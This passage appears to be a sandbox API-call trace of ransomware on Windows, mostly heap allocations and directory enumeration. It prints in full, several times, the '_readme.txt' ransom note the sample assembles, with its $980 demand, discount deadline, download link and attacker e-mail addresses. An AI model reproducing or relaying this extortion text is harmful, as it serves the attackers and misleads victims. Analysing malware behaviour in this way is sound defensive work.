(HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.408] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0184.408] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.408] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.408] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.408] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.408] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.409] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.435] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.435] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.435] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0184.436] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.436] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.436] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.436] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0184.436] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.437] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.437] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.437] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.437] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.438] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.438] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.438] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.438] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.438] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.438] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.438] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.438] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0184.439] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.439] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.440] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.440] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.440] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0184.440] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.440] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.441] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.441] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.441] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.441] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.441] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.441] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.442] PathFindFileNameW (pszPath="C:\\Boot\\pt-PT\\") returned="pt-PT\\" [0184.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.442] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0184.442] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0184.442] PathFindFileNameW (pszPath="") returned="" [0184.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.442] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x74ff0000 [0184.443] GetProcAddress (hModule=0x74ff0000, lpProcName="SHGetFolderPathW") returned 0x75075708 [0184.443] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x800) returned 0x2e902a8 [0184.443] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2e902a8 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0184.443] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x2e765d0 [0184.443] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.443] FreeLibrary (hLibModule=0x74ff0000) returned 1 [0184.444] PathAppendW (in: pszPath="C:\\Boot\\pt-PT\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\pt-PT\\_readme.txt") returned 1 [0184.444] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.444] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.444] PathFileExistsW (pszPath="C:\\Boot\\pt-PT\\_readme.txt") returned 0 [0184.444] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x2e93a68 [0184.444] lstrcpyW (in: lpString1=0x2e93a68, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0184.444] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0184.445] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e77f68 [0184.445] CreateFileW (lpFileName="C:\\Boot\\pt-PT\\_readme.txt" (normalized: "c:\\boot\\pt-pt\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0184.445] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e77f68 | out: hHeap=0x620000) returned 1 [0184.446] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93a68 | out: hHeap=0x620000) returned 1 [0184.446] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.446] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.446] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-PT\\*" (normalized: "c:\\boot\\pt-pt\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28dd07a0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0184.447] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.447] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28dd07a0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.447] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe823ce95, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15e40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0184.447] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe823ce95, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15e40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0184.447] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0184.447] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.448] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83700 | out: hHeap=0x620000) returned 1 [0184.448] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83700 [0184.448] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0184.448] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.448] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.448] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.448] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.448] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.448] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.449] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.449] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.449] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.449] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.450] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.450] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.450] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.450] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.450] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.451] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.451] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.451] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.451] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.452] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.452] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.452] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0184.452] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.453] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.453] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.453] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.453] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0184.453] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.453] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.454] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.454] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.454] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.454] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.454] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.455] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.455] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0184.455] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.455] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.455] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.455] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0184.456] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.456] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.456] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.456] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0184.456] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.457] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.457] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.457] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.457] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.458] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.458] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.458] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.458] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.458] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.458] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.458] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0184.459] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.459] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.459] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.459] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0184.459] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.460] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.460] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.460] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.460] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.460] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.460] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.460] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.461] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.461] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.461] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.461] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.461] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.462] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.462] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.462] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.462] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.462] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.462] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.462] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.463] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.463] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.463] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.463] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.463] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.464] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.464] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.464] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.464] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.465] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.465] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.465] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.465] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0184.465] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.466] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.466] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.466] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.466] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.466] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.467] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.467] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.467] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.467] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0184.467] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.467] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.468] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.468] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.468] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 